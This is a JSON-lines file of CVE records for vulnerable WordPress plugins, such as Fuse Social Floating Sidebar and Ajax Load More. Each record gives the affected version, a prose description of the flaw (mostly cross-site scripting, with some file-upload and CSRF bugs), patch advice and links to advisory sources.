{"CVE_ID":"CVE-2024-5226","slug":"fuse-social-floating-sidebar","versionImpact":"5.4.10","description":"The Fuse Social Floating Sidebar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the file upload functionality in all versions up to, and including, 5.4.10 due to insufficient validation of SVG files. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a3137a1-8e46-44c6-8edd-ad9fc4d66e0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a3137a1-8e46-44c6-8edd-ad9fc4d66e0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fuse-social-floating-sidebar\\\/tags\\\/5.4.10\\\/framework\\\/redux-core\\\/inc\\\/extensions\\\/custom_fonts\\\/class-redux-extension-custom-fonts.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fuse-social-floating-sidebar\\\/tags\\\/5.4.10\\\/framework\\\/redux-core\\\/inc\\\/extensions\\\/custom_fonts\\\/class-redux-extension-custom-fonts.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131828\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131828\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fuse-social-floating-sidebar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fuse-social-floating-sidebar\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7918","slug":"pocket-widget","versionImpact":"0.1.3","description":"The Pocket Widget WordPress plugin through 0.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1697646-1090-4a2b-9987-cec07428378e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1697646-1090-4a2b-9987-cec07428378e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8505","slug":"ajax-load-more","versionImpact":"7.1.2","description":"The WordPress Infinite Scroll \u2013 Ajax Load More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_label\u2019 parameter in all versions up to, and including, 7.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca29158a-ca60-46c7-93a5-bcf76e7666e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca29158a-ca60-46c7-93a5-bcf76e7666e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/trunk\\\/core\\\/classes\\\/class-alm-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/trunk\\\/core\\\/classes\\\/class-alm-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-load-more\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-load-more\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160896\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160896\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8790","slug":"social-share-with-floating-bar","versionImpact":"1.0.3","description":"The Social Share With Floating Bar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec35484-8561-4a8c-bf67-0a880f915fb1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec35484-8561-4a8c-bf67-0a880f915fb1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-share-with-floating-bar\\\/tags\\\/1.0.3\\\/inc\\\/class-social-share-with-floating-bar-settings.php#L312\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-share-with-floating-bar\\\/tags\\\/1.0.3\\\/inc\\\/class-social-share-with-floating-bar-settings.php#L312\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11645","slug":"float-block","versionImpact":"1.7","description":"The float block WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7771a76b-bc8c-426f-a125-5bd74ccf2845\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7771a76b-bc8c-426f-a125-5bd74ccf2845\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7771a76b-bc8c-426f-a125-5bd74ccf2845\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7771a76b-bc8c-426f-a125-5bd74ccf2845\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13156","slug":"html5-video-player","versionImpact":"2.5.35","description":"The HTML5 Video Player \u2013 mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018heading\u2019 parameter in all versions up to, and including, 2.5.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/dist\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/dist\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221089\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221089\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/html5-video-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/html5-video-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0b26af2-d559-49bf-841a-1974360b3ad6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0b26af2-d559-49bf-841a-1974360b3ad6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0860","slug":"vr-frases","versionImpact":"3.0.1","description":"The VR-Frases (collect & share quotes) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/vr-frases\\\/tags\\\/3.0.1\\\/includes\\\/vr-frases-admin.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/vr-frases\\\/tags\\\/3.0.1\\\/includes\\\/vr-frases-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ea3e03-fafa-431e-b1fe-a527f491da79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ea3e03-fafa-431e-b1fe-a527f491da79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2577","slug":"bitspecter-suite","versionImpact":"1.0.0","description":"The Bitspecter Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/bitspecter-suite\\\/trunk\\\/includes\\\/Hardening\\\/BitspecterSuiteHardening.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/bitspecter-suite\\\/trunk\\\/includes\\\/Hardening\\\/BitspecterSuiteHardening.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259470\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259470\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bitspecter-suite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bitspecter-suite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e0f35be-fbd1-4063-a1c8-a8e4398d8f0a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e0f35be-fbd1-4063-a1c8-a8e4398d8f0a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1303","slug":"wc-checkout-getnet","versionImpact":"1.7.3","description":"The Plugin Oficial  WordPress plugin through 1.7.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35181798-4f21-4c8d-bb6e-61eb13683a74\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35181798-4f21-4c8d-bb6e-61eb13683a74\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3781","slug":"raisely-donation-form","versionImpact":"1.0","description":"The Raisely Donation Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's raisely_donation_form shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/raisely-donation-form\\\/trunk\\\/inc\\\/base\\\/providers\\\/shortcodes.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/raisely-donation-form\\\/trunk\\\/inc\\\/base\\\/providers\\\/shortcodes.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/raisely-donation-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/raisely-donation-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0716485b-e94b-4e09-9c01-1059017bfcc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0716485b-e94b-4e09-9c01-1059017bfcc8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-53260","slug":"file-manager-plugin-for-wordpress","versionImpact":"7.5","description":"Unrestricted Upload of File with Dangerous Type vulnerability in getredhawkstudio File Manager Plugin For Wordpress allows Upload a Web Shell to a Web Server. This issue affects File Manager Plugin For Wordpress: from n\/a through 7.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/file-manager-plugin-for-wordpress\\\/vulnerability\\\/wordpress-file-manager-plugin-for-wordpress-plugin-7-5-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/file-manager-plugin-for-wordpress\\\/vulnerability\\\/wordpress-file-manager-plugin-for-wordpress-plugin-7-5-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47145","slug":"blockonomics-bitcoin-payments","versionImpact":"3.5.7","description":"Reflected Cross-Site Scripting (XSS) vulnerability in Blockonomics WordPress Bitcoin Payments \u2013 Blockonomics plugin <= 3.5.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/blockonomics-bitcoin-payments\\\/wordpress-wordpress-bitcoin-payments-blockonomics-plugin-3-5-7-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/blockonomics-bitcoin-payments\\\/wordpress-wordpress-bitcoin-payments-blockonomics-plugin-3-5-7-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2496","slug":"go_pricing","versionImpact":"3.3.19","description":"The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized arbitrary file uploads due to an improper capability check on the 'validate_upload' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/477c6fa2-16a8-4461-b4d4-d087e13e3ca7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/477c6fa2-16a8-4461-b4d4-d087e13e3ca7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0993","slug":"wp-simple-firewall","versionImpact":"17.0.17","description":"The Shield Security plugin for WordPress is vulnerable to Missing Authorization on the 'theme-plugin-file' AJAX action in versions up to, and including, 17.0.17. This allows authenticated attackers to add arbitrary audit log entries indicating that a theme or plugin has been edited, and is also a vector for Cross-Site Scripting via CVE-2023-0992.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-firewall\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-firewall\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/674461ad-9b61-48c4-af2a-5dfcaeb38215?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/674461ad-9b61-48c4-af2a-5dfcaeb38215?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2883864%40wp-simple-firewall%2Ftrunk&old=2883536%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2883864%40wp-simple-firewall%2Ftrunk&old=2883536%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2082","slug":"buymeacoffee","versionImpact":"3.6","description":"The \"Buy Me a Coffee \u2013 Button and Widget Plugin\" plugin for WordPress is vulnerable to Cross-Site Scripting in versions up to, and including, 3.6 due to insufficient sanitization and escaping on the 'text value set via the bmc_post_reception action. This makes it possible for authenticated attackers, with subscriber-level permissions, and above to inject arbitrary web scripts into pages that execute whenever a victim accesses a page with the injected scripts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fbuymeacoffee%2Ftags%2F3.6&old=2922493&new_path=%2Fbuymeacoffee%2Ftags%2F3.7&new=2922493&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fbuymeacoffee%2Ftags%2F3.6&old=2922493&new_path=%2Fbuymeacoffee%2Ftags%2F3.7&new=2922493&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed9f8948-085b-4ac5-befd-c70085aa23cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed9f8948-085b-4ac5-befd-c70085aa23cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0898","slug":"chat-bubble","versionImpact":"2.3","description":"The Chat Bubble \u2013 Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chat-bubble\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chat-bubble\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7689","slug":"snapshot-backup","versionImpact":"2.1.1","description":"The Snapshot Backup WordPress plugin through 2.1.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4463785c-55db-4f86-80a2-ada4d2241e5e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4463785c-55db-4f86-80a2-ada4d2241e5e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8282","slug":"ibtana-visual-editor","versionImpact":"1.2.4.4","description":"The Ibtana \u2013 WordPress Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 attribute within the 'wp:ive\/ive-productscarousel' Gutenberg block in all versions up to, and including, 1.2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a281774-226a-4cb7-ba4a-ebb76f20eb47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a281774-226a-4cb7-ba4a-ebb76f20eb47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/dist\\\/blocks.build.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/dist\\\/blocks.build.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ibtana-visual-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ibtana-visual-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160421\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160421\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8740","slug":"getresponse","versionImpact":"2.5.6","description":"The GetResponse Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51d14f45-4c30-4225-998d-f4f829e09bc0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51d14f45-4c30-4225-998d-f4f829e09bc0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getresponse\\\/tags\\\/2.4.1\\\/includes\\\/eoi-subscribers.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getresponse\\\/tags\\\/2.4.1\\\/includes\\\/eoi-subscribers.php#L353\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11002","slug":"inpost-gallery","versionImpact":"2.1.4.2","description":"The The InPost Gallery plugin for WordPress is vulnerable to arbitrary shortcode execution via the inpost_gallery_get_shortcode_template AJAX action in all versions up to, and including, 2.1.4.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/inpost-gallery\\\/trunk\\\/index.php#L323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/inpost-gallery\\\/trunk\\\/index.php#L323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192113\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192113\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inpost-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inpost-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fbb2dcf-38b8-4ef1-bfea-bf5872cc7e37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fbb2dcf-38b8-4ef1-bfea-bf5872cc7e37?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11644","slug":"wp-svg","versionImpact":"0.9","description":"The WP-SVG WordPress plugin through 0.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b6a80f1-369c-4dd2-877e-60b724084819\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b6a80f1-369c-4dd2-877e-60b724084819\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b6a80f1-369c-4dd2-877e-60b724084819\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b6a80f1-369c-4dd2-877e-60b724084819\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13758","slug":"cp-contact-form-with-paypal","versionImpact":"1.3.52","description":"The CP Contact Form with PayPal plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.52. This is due to missing or incorrect nonce validation on the cp_contact_form_paypal_check_init_actions() function. This makes it possible for unauthenticated attackers to add discount codes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cp-contact-form-with-paypal\\\/trunk\\\/cp_contactformpp_functions.php#L616\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cp-contact-form-with-paypal\\\/trunk\\\/cp_contactformpp_functions.php#L616\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230873\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230873\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cp-contact-form-with-paypal\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cp-contact-form-with-paypal\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/495183b6-dc7c-4ff7-bc99-fc05a10d1269?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/495183b6-dc7c-4ff7-bc99-fc05a10d1269?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
